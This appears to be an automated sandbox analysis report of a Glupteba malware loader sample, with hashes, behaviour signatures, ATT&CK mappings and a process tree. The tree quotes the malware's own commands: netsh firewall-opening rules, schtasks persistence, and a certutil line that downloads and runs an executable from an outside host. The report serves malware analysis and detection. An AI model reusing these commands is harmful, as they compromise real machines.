Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 13:51

General

  • Target

    f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9.exe

  • Size

    3.8MB

  • MD5

    d8553d002a6764dc4995da92cb51fa2b

  • SHA1

    b5746050922832f0eab74bea5dda43357af139b1

  • SHA256

    f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9

  • SHA512

    2417a348a6de672724b94406063138bbc17c23f7181c48bf4a5d02322723df28a48a751a130077125d8ceb5985a1da6729b196070e064a8a5251c44f5dceb8c6

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9.exe
    "C:\Users\Admin\AppData\Local\Temp\f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4380
    • C:\Users\Admin\AppData\Local\Temp\f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9.exe
      "C:\Users\Admin\AppData\Local\Temp\f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3364
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:4672
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3740
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:4084
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1972
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:1896
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3120
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:3956
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:5008
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4708

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        d8553d002a6764dc4995da92cb51fa2b

        SHA1

        b5746050922832f0eab74bea5dda43357af139b1

        SHA256

        f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9

        SHA512

        2417a348a6de672724b94406063138bbc17c23f7181c48bf4a5d02322723df28a48a751a130077125d8ceb5985a1da6729b196070e064a8a5251c44f5dceb8c6

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        d8553d002a6764dc4995da92cb51fa2b

        SHA1

        b5746050922832f0eab74bea5dda43357af139b1

        SHA256

        f4cdfcbde404bf0b59fe0f7a0738fbc9d8bac3d5b2402478e6f00ca13b40cbd9

        SHA512

        2417a348a6de672724b94406063138bbc17c23f7181c48bf4a5d02322723df28a48a751a130077125d8ceb5985a1da6729b196070e064a8a5251c44f5dceb8c6

      • memory/1896-144-0x0000000000000000-mapping.dmp
      • memory/1972-141-0x0000000000000000-mapping.dmp
      • memory/1972-150-0x0000000000400000-0x0000000002FBF000-memory.dmp
        Filesize

        43.7MB

      • memory/1972-149-0x0000000005200000-0x00000000055A6000-memory.dmp
        Filesize

        3.6MB

      • memory/3120-145-0x0000000000000000-mapping.dmp
      • memory/3364-135-0x00000000050C0000-0x00000000057B5000-memory.dmp
        Filesize

        7.0MB

      • memory/3364-136-0x0000000000400000-0x0000000002FBF000-memory.dmp
        Filesize

        43.7MB

      • memory/3364-134-0x0000000004D0D000-0x00000000050B3000-memory.dmp
        Filesize

        3.6MB

      • memory/3364-133-0x0000000000000000-mapping.dmp
      • memory/3740-139-0x0000000000000000-mapping.dmp
      • memory/3956-146-0x0000000000000000-mapping.dmp
      • memory/4084-140-0x0000000000000000-mapping.dmp
      • memory/4380-130-0x0000000004F0B000-0x00000000052B1000-memory.dmp
        Filesize

        3.6MB

      • memory/4380-132-0x0000000000400000-0x0000000002FBF000-memory.dmp
        Filesize

        43.7MB

      • memory/4380-131-0x00000000052C0000-0x00000000059B5000-memory.dmp
        Filesize

        7.0MB

      • memory/4672-138-0x0000000000000000-mapping.dmp
      • memory/5008-148-0x0000000000000000-mapping.dmp
      • memory/5056-137-0x0000000000000000-mapping.dmp